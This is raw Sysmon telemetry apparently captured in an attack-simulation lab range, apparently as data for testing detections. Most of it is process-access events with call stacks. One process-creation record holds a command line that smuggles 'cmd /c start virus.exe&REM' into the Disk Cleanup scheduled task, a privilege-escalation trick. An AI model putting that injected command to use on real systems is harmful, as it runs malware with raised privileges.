07:57:19.260{466BC892-32CD-60E8-670B-00000000CF01}45163808C:\Windows\system32\csrss.exe{466BC892-F5DF-60EB-7E7D-00000000CF01}9640C:\temp\test\virus.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051006Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.260{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051005Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.260{466BC892-F5DF-60EB-7A7D-00000000CF01}11887452C:\Windows\System32\cmd.exe{466BC892-F5DF-60EB-7E7D-00000000CF01}9640C:\temp\test\virus.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\cmd.exe+1b13|C:\Windows\System32\cmd.exe+c9d2|C:\Windows\System32\cmd.exe+c295|C:\Windows\System32\cmd.exe+8564|C:\Windows\System32\cmd.exe+c347|C:\Windows\System32\cmd.exe+f916|C:\Windows\System32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
154100x80000000000000001051004Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.261{466BC892-F5DF-60EB-7E7D-00000000CF01}9640C:\Temp\test\virus.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\temp\test\virus.exe C:\Windows\system32\ATTACKRANGE\bob{466BC892-32CE-60E8-19BC-780000000000}0x78bc193MediumMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{466BC892-F5DF-60EB-7A7D-00000000CF01}1188C:\Windows\System32\cmd.execmd /c start C:\temp\test\virus.exe&REM \system32\cleanmgr.exe /autoclean /d C: 10341000x80000000000000001051003Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.244{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F5DF-60EB-7A7D-00000000CF01}1188C:\Windows\System32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051002Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:19.244{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F5DF-60EB-7A7D-00000000CF01}1188C:\Windows\System32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051001Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.244{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F5DF-60EB-7C7D-00000000CF01}6328C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051000Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.244{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F5DF-60EB-7C7D-00000000CF01}6328C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050999Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:19.230{466BC892-32D3-60E8-770B-00000000CF01}63567136C:\Windows\Explorer.EXE{466BC892-F5DF-60EB-7A7D-00000000CF01}1188C:\Windows\System32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050998Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.230{466BC892-32D3-60E8-770B-00000000CF01}63567136C:\Windows\Explorer.EXE{466BC892-F5DF-60EB-7A7D-00000000CF01}1188C:\Windows\System32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050997Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:19.230{466BC892-32D3-60E8-770B-00000000CF01}63567136C:\Windows\Explorer.EXE{466BC892-F5DF-60EB-7A7D-00000000CF01}1188C:\Windows\System32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050996Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.213{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F5DF-60EB-7C7D-00000000CF01}6328C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050995Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.213{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F5DF-60EB-7C7D-00000000CF01}6328C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001050994Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.213{466BC892-F5DF-60EB-7C7D-00000000CF01}63284804C:\Windows\system32\conhost.exe{466BC892-F5DF-60EB-7A7D-00000000CF01}1188C:\Windows\System32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050993Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.212{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050992Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.211{466BC892-F5DD-60EB-757D-00000000CF01}969210124C:\Windows\system32\conhost.exe{466BC892-F5DF-60EB-7D7D-00000000CF01}1328C:\Windows\system32\timeout.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001050991Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.211{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050990Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.211{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050989Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:19.210{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050988Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.207{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F5DF-60EB-7D7D-00000000CF01}1328C:\Windows\system32\timeout.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050987Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:19.206{466BC892-F5DC-60EB-747D-00000000CF01}43042332C:\Windows\system32\cmd.exe{466BC892-F5DF-60EB-7D7D-00000000CF01}1328C:\Windows\system32\timeout.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050986Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.206{466BC892-F5DF-60EB-7D7D-00000000CF01}1328C:\Windows\System32\timeout.exe10.0.14393.0 (rs1_release.160715-1616)timeout - pauses command processingMicrosoft® Windows® Operating SystemMicrosoft Corporationtimeout.exetimeout /t 3 C:\Temp\test\ATTACKRANGE\bob{466BC892-32CE-60E8-37BC-780000000000}0x78bc373MediumMD5=FF04FB5121867334F841D5EFD133633B,SHA256=F9B3348029B76BBB658A097BF361EA72CEFA0D15CE444E9E8A689B35B67A78E7,IMPHASH=709A3AA304E78434B9FA3FE865133AD0{466BC892-F5DC-60EB-747D-00000000CF01}4304C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Temp\test\sil.bat" " 10341000x80000000000000001050985Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.204{466BC892-0664-60E8-6503-00000000CF01}40245356C:\Windows\system32\csrss.exe{466BC892-F5DF-60EB-7B7D-00000000CF01}8008C:\Windows\system32\cleanmgr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050984Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:19.202{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F5DF-60EB-7C7D-00000000CF01}6328C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050983Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.201{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050982Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:19.200{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050981Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.200{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050980Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:19.200{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050979Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.199{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F5DF-60EB-7B7D-00000000CF01}8008C:\Windows\system32\cleanmgr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050978Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:19.198{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F5DF-60EB-7B7D-00000000CF01}8008C:\Windows\system32\cleanmgr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\UBPM.dll+acf0|c:\windows\system32\UBPM.dll+fa34|c:\windows\system32\UBPM.dll+cdcc|c:\windows\system32\UBPM.dll+108c6|c:\windows\system32\UBPM.dll+d439|c:\windows\system32\UBPM.dll+dc95|c:\windows\system32\UBPM.dll+21f3|c:\windows\system32\UBPM.dll+1cdb|c:\windows\system32\UBPM.dll+1b6f|c:\windows\system32\schedsvc.dll+3095b|c:\windows\system32\schedsvc.dll+175bc|c:\windows\system32\schedsvc.dll+3a8de|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c 10341000x80000000000000001050977Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.166{466BC892-32CD-60E8-670B-00000000CF01}45164260C:\Windows\system32\csrss.exe{466BC892-F5DF-60EB-7A7D-00000000CF01}1188C:\Windows\System32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050976Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:19.164{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050975Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 